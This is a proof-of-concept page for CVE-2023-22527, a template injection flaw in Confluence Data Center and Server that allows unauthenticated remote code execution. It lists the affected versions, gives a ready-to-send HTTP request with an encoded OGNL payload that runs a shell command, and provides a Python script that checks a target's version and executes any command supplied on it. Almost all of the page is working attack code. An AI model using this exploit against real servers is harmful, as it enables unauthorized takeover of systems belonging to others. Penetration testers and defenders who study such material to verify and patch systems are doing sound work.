Confluence - CVE-2023-22527
A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance.
Affected Versions:
8.0.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3
POC
Simple one-liner usable with Burp. RCE response is seen in header X-Cmd-Response.
POST /template/aui/text-inline.vm HTTP/1.1
Host: <HOST_NAME>
Content-Type: application/x-www-form-urlencoded
Connection: close
label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29Python script to simplify the process:
import argparse
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse
def get_confluence_version(target):
parsed_url = urlparse(target)
url = f"http://{parsed_url.netloc}/"
try:
response = requests.get(url)
response.raise_for_status()
soup = BeautifulSoup(response.text, 'html.parser')
version_span = soup.find('span', {'id': 'footer-build-information'})
if version_span:
confluence_version = version_span.text.strip()
return confluence_version
except requests.exceptions.RequestException as e:
print(f"Error: {e}")
return None
def check_exploitable_version(version):
exploitable_versions = ['8.0.', '8.1.', '8.2.', '8.3.', '8.4.', '8.5.0', '8.5.1', '8.5.2', '8.5.3']
for exploitable_version in exploitable_versions:
if version.startswith(exploitable_version):
return True
return False
def exploit(target, cmd):
confluence_version = get_confluence_version(target)
if confluence_version:
print(f"Confluence version: {confluence_version}")
if check_exploitable_version(confluence_version):
url = f"{target}/template/aui/text-inline.vm"
http_proxy = "http://127.0.0.1:8080"
https_proxy = "http://127.0.0.1:8080"
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = r"label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({'"+ cmd +"'}))"
response = requests.post(url, headers=headers, data=data, verify=False)
if (response.headers.get("X-Cmd-Response")):
print("Command Output:")
print(response.headers.get("X-Cmd-Response"))
else:
print("No response")
else:
print("The version cannot exploit the exploit")
else:
print("Unable to determine version of Confluence")
def main():
parser = argparse.ArgumentParser(
description="Send request with target and cmd parameters",
usage="python3 CVE-2023-22527.py --target <target> --cmd <cmd>\nExample: python3 CVE-2023-22527.py --target http://192.168.139.202 --cmd \"whoami\""
)
parser.add_argument("--target", required=True, help="Target address without http://")
parser.add_argument("--cmd", required=True, help="Value for the cmd parameter")
args = parser.parse_args()
exploit(args.target, args.cmd)
if __name__ == "__main__":
main()Last updated
